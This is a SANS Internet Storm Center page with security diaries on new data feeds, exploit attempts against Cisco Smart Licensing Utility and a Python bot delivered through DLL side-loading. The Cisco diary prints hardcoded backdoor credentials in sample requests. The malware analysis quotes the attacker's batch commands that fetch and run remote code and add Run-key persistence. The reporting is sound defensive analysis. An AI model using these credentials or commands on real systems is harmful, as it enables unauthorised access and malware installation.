🏳️SANS.edu Internet Storm Center - SANS Internet Storm Center

Website faviconisc.sans.edu

SANS.edu Internet Storm Center. Today's Top Story: Some new Data Feeds, and a little "incident".;

Handler on Duty: [Johannes Ullrich](/handler_list.html#johannes-ullrich "Johannes Ullrich")

Threat Level: [green](/infocon.html)

[SANS Stormcast Friday Mar 21st: New Data Feeds; SEO Spam; Veeam Deserialization; IBM AIX RCE;](podcastdetail/9374)

Diaries

=======

### [View All](/diaryarchive.html)

Published: 2025-03-20 by Johannes Ullrich

[Some new Data Feeds, and a little "incident".](/forums/diary/Some%20new%20Data%20Feeds%2C%20and%20a%20little%20%22incident%22./31786/)

---------------------------------------------------------------------------------------------------------------------------------------

Our API (https://isc.sans.edu/api) continues to be quite popular. One query we see a lot is lookups for individual IP addresses. Running many queries as you go through a log may cause you to get locked out by our rate limit. To help with that, we now offer additional "summary feeds" that include all data recently received. You may download these feeds and import them in your database of choice (or grep the text file for records). This will make bulk lookups a lot easier and faster.

For more details and continuing updates, see, [https://isc.sans.edu/feeds\_doc.html](https://isc.sans.edu/feeds_doc.html)

I will gladly add more feeds as needed. Please let me know via our [contact page](/contact.html) if you run into errors.

We do often get requests for commercial use of our data. Our data is published under a "[Creative Commons](https://creativecommons.org/licenses/by-nc-sa/4.0/) Attribution-NonCommercial-ShareAlike 4.0 International" license. You may use the data if you attribute it to us and do not resell it. We are okay with you using the data in a SOC at a commercial enterprise to help you defend your organization.

If you find it helpful: Let us know. Tell us what works and does not work. The simplest way to help us out is to run one of our honeypots and tell us what works or doesn't work with it. Please do not ask us to remove data because you consider it a false positive. False positives are part of the game, and while we will gladly add comments to some of the data, we do not remove data as it may distort it for other research tasks.

But enough about data feeds. Today, we also had a recurrence of an attack I hadn't seen in a while. This "incident" started with some of our handlers receiving a request to update a link in an older podcast:

The e-mail looked reasonable at first, and we do not mind corrections. URLs change. But in this case, it turned out to be a fake request. The email did not originate from EFF. Ok, sometimes organizations use marketing firms, and they may not be competent enough to use the customer's e-mail domain. But this was certainly a fake update request. The original URL still works. It just redirects to another page at EFF.org. The "academized.com" page, as far as I can tell, is not related to EFF at all. The content matches the EFF page, but it belongs to an "Essay Writing Service", a type of business we do not want to link to being part of a reputable academic institution. These businesses are hurting these days due to AI tools doing a better/cheaper job. In the past, paper writing services have also often used comment spam to advertise.

\---  

Johannes B. Ullrich, Ph.D. , Dean of Research, [SANS.edu](https://sans.edu)  

[Twitter](https://jbu.me/164)|

**Johannes Ullrich**

Published: 2025-03-19 by Johannes Ullrich

[Exploit Attempts for Cisco Smart Licensing Utility CVE-2024-20439 and CVE-2024-20440](/forums/diary/Exploit%20Attempts%20for%20Cisco%20Smart%20Licensing%20Utility%20CVE-2024-20439%20and%20CVE-2024-20440/31782/)

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

In September, Cisco published an advisory noting two vulnerabilities \[1\]:

*   CVE-2024-20439: Cisco Smart Licensing Utility Static Credential Vulnerability

*   CVE-2024-20440: Cisco Smart Licensing Utility Information Disclosure Vulnerability

These two vulnerabilities are somewhat connected. The first one is one of the many backdoors Cisco likes to equip its products with. A simple fixed password that can be used to obtain access. The second one is a log file that logs more than it should. Using the first vulnerability, an attacker may access the log file. A quick search didn’t show any active exploitation, but details, including the backdoor credentials, were published in a blog by Nicholas Starke shortly after Cisco released its advisory \[2\]. So it is no surprise that we are seeing some exploit activity:

The API affected by this vulnerability can be found at /cslu/v1. One of the sample requests:

> `GET /cslu/v1/scheduler/jobs HTTP/1.1   Host: [redacted]:80   Authorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=   Connection: close`  

>  

The base64 encoded string decodes to: `cslu-windows-client:Library4C$LU` , the credentials Nicholas's blog identified.

The same group looking for this URL is also attempting several other attacks. Most are just looking for configuration files like "/web.config.zip", and interestingly, they also picked to scan for what looks like CVE-2024-0305  (but I am not sure about that. I base this on the exploit found on GitHub \[3\]). Other vulnerability notes suggest a different URL for this vulnerability. Either way, it is likely a vulnerability in a DVR.

> `GET /classes/common/busiFacade.php HTTP/1.1   Host: [redacted]:80   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36   Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0RjgwMjVFNw==   Content-Type: application/x-www-form-urlencoded   Connection: close`

In this case, the credentials decode to: `helpdeskIntegrationUser:dev-C4F8025E` .   

It's always fun to see how cheap IoT devices and expensive enterprise security software share similar basic vulnerabilities.

\[1\] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw  

\[2\] https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html  

\[3\] https://github.com/jidle123/cve-2024-0305exp/blob/main/cve-2024-0305.py

\---  

Johannes B. Ullrich, Ph.D. , Dean of Research, [SANS.edu](https://sans.edu)  

[Twitter](https://jbu.me/164)|

**Johannes Ullrich**

Published: 2025-03-18 by Xavier Mertens

[Python Bot Delivered Through DLL Side-Loading](/forums/diary/Python%20Bot%20Delivered%20Through%20DLL%20Side-Loading/31778/)

-----------------------------------------------------------------------------------------------------------------------------

One of my hunting rules triggered some suspicious Python code, and, diving deeper, I found an interesting example of DLL side-loading. This technique involves placing a malicious DLL with the same name and export structure as a legitimate DLL in a location the application checks first, causing the application to load the malicious DLL instead of the intended one. This is a classic vulnerability seen for years in many software. The attacker also implemented simple tricks to bypass classic security controls.

The malware is delivered through a ZIP archive: “Hootsuite (1).zip”\[[1](https://www.virustotal.com/gui/file/dee0f033d6f965dd9eebc3bb0c326f85881ef8674cea5f05f4ccc3e7de4264c3/detection)\]. The archive contains some files that have the Hidden protection flag:

Once opened by the victim, the only file displayed is Hootsuite.exe with a PDF icon. The file is not malicious and has been known on VT since 2017!\[[2](https://www.virustotal.com/gui/file/08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2/detection)\]. This is a copy of the old Haihaisoft PDF reader\[[3](https://www.haihaisoft.com/PDF_Reader_download.aspx)\] with a DLL side-loading vulnerability. When executed from a normal (empty) directory, you get the reader:

Once executed from the directory extracted from the ZIP archive, there is a msimg32.dll (hidden). This DLL is malicious\[[4](https://www.virustotal.com/gui/file/993a043186315aa23b685c319eaff841875653971917a75baa3656fb4bb4258c/detection)\]. Compared to the official version, this one is pretty big (103MB), probably to avoid being scanned by many security tools (for performance reasons). This DLL will be loaded instead of the Microsoft one:

Once executed, the behavior of the PDF reader will be completely different:

This is confirmed while debugging the process:

The .bat script will perform some interesting tasks. First, it will unpack and install a simple Python environment:

mkdir C:\\Users\\Public\\R8D4YmtQLNucXFlnq3

Rar x -pC2PINduHvfu86NQXni -inul -y QkCIiJe4GE3FJLfTqe.rar C:\\Users\\Public\\R8D4YmtQLNucXFlnq3

Then, it will fetch the Python bot:

set "CODE\_LOADER=import requests,base64; exec(base64.b64decode(requests.get('hxxps://bitbucket\[.\]org/lonenone111/long/raw/7600761c03bce0b01ec944de76bc155b81158ce7/Final\_Bot').text))"

start "" /min "C:\\Users\\Public\\R8D4YmtQLNucXFlnq3\\synaptics.exe" -c "%CODE\_LOADER%"

To bypass simple rules that track for suspicious process names, “python.exe” has been renamed to “synaptic.exe”.

Finally, persistence is implemented:

echo start "" /min "C:\\Users\\Public\\R8D4YmtQLNucXFlnq3\\synaptics.exe" -c "%CODE\_LOADER%" >> "C:\\Users\\Public\\Windows Security"

echo //4mY2xzDQo= > "C:\\Users\\Public\\Windows Security.~b64"

certutil -f -decode "C:\\Users\\Public\\Windows Security.~b64" "C:\\Users\\Public\\Windows Security.bat"

copy /b "C:\\Users\\Public\\Windows Security.bat" /b + "C:\\Users\\Public\\Windows Security" /b "C:\\Users\\Public\\Windows Security.bat"

reg add "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /v "Windows Security" /t REG\_SZ /d "C:\\Windows\\Explorer.EXE C:\\Users\\Public\\Windows Security.bat" /f

Note how BOM (Byte Order Mark) has been implemented by the attacker with the small Base64 string:

remnux@remnux:/MalwareZoo/20250317/hootsuite/images$ base64dump.py .bat -s 14 -d | xxd

00000000: fffe 2663 6c73 0d0a                      ..&cls..

Finally, a decoy PDF file (not malicious) present in the archive is opened using the default system viewer.

Unfortunately, the “Final\_Bot” file is no longer available...

\[1\] [https://www.virustotal.com/gui/file/dee0f033d6f965dd9eebc3bb0c326f85881ef8674cea5f05f4ccc3e7de4264c3/detection](https://www.virustotal.com/gui/file/dee0f033d6f965dd9eebc3bb0c326f85881ef8674cea5f05f4ccc3e7de4264c3/detection)  

\[2\] [https://www.virustotal.com/gui/file/08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2/detection](https://www.virustotal.com/gui/file/08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2/detection)  

\[3\] [https://www.haihaisoft.com/PDF\_Reader\_download.aspx](https://www.haihaisoft.com/PDF_Reader_download.aspx)  

\[4\] [https://www.virustotal.com/gui/file/993a043186315aa23b685c319eaff841875653971917a75baa3656fb4bb4258c/detection](https://www.virustotal.com/gui/file/993a043186315aa23b685c319eaff841875653971917a75baa3656fb4bb4258c/detection)

Xavier Mertens (@xme)  

Xameco  

Senior ISC Handler - Freelance Cyber Security Consultant  

[PGP Key](https://keybase.io/xme/key.asc)

**Xavier Mertens**

Podcasts

========

### [View All](/podcast)

[

SANS Stormcast Friday Mar 21st: New Data Feeds; SEO Spam; Veeam Deserialization; IBM AIX RCE;

---------------------------------------------------------------------------------------------

Released: 2025-03-21 02:00:02](/podcastdetail/9374)

A daily summary of cyber security news from the SANS Internet Stormcenter

[

Listen Now

](/podcastdetail/9374)

[

SANS Stormcast Thursday Mar 20th: Cisco Smart Licensing Attacks; Vulnerable Drivers again; Synology Advisories Updated

----------------------------------------------------------------------------------------------------------------------

Released: 2025-03-20 02:00:02](/podcastdetail/9372)

A daily summary of cyber security news from the SANS Internet Stormcenter

[

Listen Now

](/podcastdetail/9372)

[

SANS Stormcast Wednesday Mar 19th 2025: Python DLL Side Loading; Tomcast RCE Correction; SAML Roulette; Windows Shortcut 0-Day

------------------------------------------------------------------------------------------------------------------------------

Released: 2025-03-19 02:00:02](/podcastdetail/9370)

A daily summary of cyber security news from the SANS Internet Stormcenter

[

Listen Now

](/podcastdetail/9370)

[

SANS Stormcast Tuesday Mar 18th 2025: Analyzing GUID Encoded Shellcode; Node.js SAML Vuln; Tomcat RCE in the Wild; CSS e-mail obfuscation

-----------------------------------------------------------------------------------------------------------------------------------------

Released: 2025-03-18 02:00:02](/podcastdetail/9368)

A daily summary of cyber security news from the SANS Internet Stormcenter

[

Listen Now

](/podcastdetail/9368)

[

SANS Stormcast Monday March 17th: Mirai Makes Mistakes; Compromised Github Action; ruby-saml vulnerability; Fake GitHub Security Alert Phishing

-----------------------------------------------------------------------------------------------------------------------------------------------

Released: 2025-03-17 01:35:10](/podcastdetail/9366)

A daily summary of cyber security news from the SANS Internet Stormcenter

[

Listen Now

](/podcastdetail/9366)

[

SANS Stormcast: File Hashes in MSFT BI; Apache Camel Vuln; Juniper Fixes Exploited Vuln; AMI Patches 10.0 Redfish BMC Vuln

--------------------------------------------------------------------------------------------------------------------------

Released: 2025-03-14 02:00:02](/podcastdetail/9364)

A daily summary of cyber security news from the SANS Internet Stormcenter

[

Listen Now

](/podcastdetail/9364)

[

SANS Stormcast Thursday Mar 13th: Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates;

------------------------------------------------------------------------------------------------------------------------------------------------------------

Released: 2025-03-13 02:00:02](/podcastdetail/9362)

A daily summary of cyber security news from the SANS Internet Stormcenter

[

Listen Now

](/podcastdetail/9362)

Jobs

====

### [View All](/jobs/)

**Experian** • UK-Remote

Cyber Incident Response Lead

----------------------------

GCIH, GCFE, GCFA, GCFR

View Details Apply Now

**Experian** • US - Remote

Cyber Incident Response Lead - Advanced Response Team

-----------------------------------------------------

GCIH, GCFE, GCFA, GCFR

View Details Apply Now

**Experian** • US-Remote

Senior Manager, Global Incident Response

----------------------------------------

GCIH, GCFE, GCFA, GCFR

View Details Apply Now

**UKG** • Weston, FL, Alpharetta,GA, Atlanta,GA, Lowell,MA, Seattle,WA, San Francisco,CA

Principal Product Security Engineer

-----------------------------------

GSE, GXPN, GREM

View Details Apply Now

**Partner Forces** • Arlington, VA

Senior Cybersecurity SME

------------------------

GIAC Response and Industrial Defense (GRID), GIAC Industrial Cyber Security Professional (GICSP)

View Details Apply Now

*   [Homepage](/index.html)

*   [Diaries](/diaryarchive.html)

*   [Podcasts](/podcast.html)

*   [Jobs](/jobs)

*   [Data](/data)

    *   [TCP/UDP Port Activity](/data/port.html)

    *   [Port Trends](/data/trends.html)

    *   [SSH/Telnet Scanning Activity](/data/ssh.html)

    *   [Weblogs](/weblogs)

    *   [Threat Feeds Activity](/data/threatfeed.html)

    *   [Threat Feeds Map](/data/threatmap.html)

    *   [Useful InfoSec Links](/data/links.html)

    *   [Presentations & Papers](/data/presentation.html)

    *   [Research Papers](/data/researchpapers.html)

    *   [API](/api)

*   [Tools](/tools/)

    *   [DShield Sensor](/howto.html)

    *   [DNS Looking Glass](/tools/dnslookup)

    *   [Honeypot (RPi/AWS)](/tools/honeypot)

    *   [InfoSec Glossary](/tools/glossary)

*   [Contact Us](/contact.html)

    *   [Contact Us](/contact.html)

    *   [About Us](/about.html)

    *   [Handlers](/handler_list.html)

*   [About Us](/about.html)

[Slack Channel](/slack/index.html)

[Mastodon](https://infosec.exchange/@sans_isc)

[Bluesky](https://bsky.app/profile/sansisc.bsky.social)

[X](https://twitter.com/sans_isc)

Subscribe to the daily podcast via [RSS](/dailypodcast.xml) or [iTunes](http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=304863991)

© 2025 SANS™ Internet Storm Center Developers: We have an [API](/api/) for you!  [](https://creativecommons.org/licenses/by-nc-sa/4.0/)  

*   [Link To Us](/linkback.html)

*   [About Us](/about.html)

*   [Handlers](/handler_list.html)

*   [Privacy Policy](/privacy.html)

*   [](https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A)

*   [](https://twitter.com/sans_isc)

*   [](https://www.linkedin.com/groups?gid=35470)

*   [](https://infosec.exchange/@sans_isc)

*   [](/xml.html)